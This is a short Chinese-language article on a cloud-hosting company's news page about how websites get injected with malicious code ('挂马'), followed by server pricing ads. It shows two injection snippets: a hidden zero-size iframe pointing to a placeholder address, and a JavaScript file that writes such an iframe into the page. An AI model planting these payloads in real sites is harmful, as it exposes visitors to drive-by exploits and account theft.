关于我们

质量为本、客户为根、勇于拼搏、务实创新

< 返回新闻公共列表

云服务器

网站是怎么被人挂马的,怎么找漏洞

发布时间:2021-03-21 14:54:18

如果是在访问出来的源文件的头上,或是最后有被加代码,这个一般是网站文件被要改了,或是ARP,如果是源文件的很多数据位置(中间),那一般是数据库被人挂了。

不完全统计,90%的网站都被挂过马,挂马是指在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行盗号等危险超过。目前挂马主要是为了商业利益,有的挂马是为了赚取流量,有的是为了盗取游戏等账号,也有的是为了好玩,不管是处于那种目的,对于访问被挂马的网站来说都是一种潜在的威胁,影响运营网站公司形象。

一:框架挂马

<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马
首先将以下代码

document.write("<iframe width='0' height='0' src='地址'></iframe>");

保存为xxx.js,
则JS挂马代码为

<script language=javascript src=xxx.js></script>


  • 日销1000+
    基础型云服务器

    1核CPU

    1G内存

    50G硬盘

    3M带宽

    独立IP

    分布式存储

    适合企业官网、个人站长类网站

    ¥32 原价¥64

  • 日销1000+
    高性能云服务器

    4核CPU

    4G内存

    50G硬盘

    5M带宽

    独立IP

    分布式存储

    适合企业官网、行业门户类网站

    ¥132 原价¥264

  • 日销1000+
    高防云服务器

    8核CPU

    8G内存

    50G硬盘

    5M带宽

    独立IP

    100G高防

    适合游戏、电商类网站

    ¥410 原价¥500


/template/Home/Beitongyun/PC/Static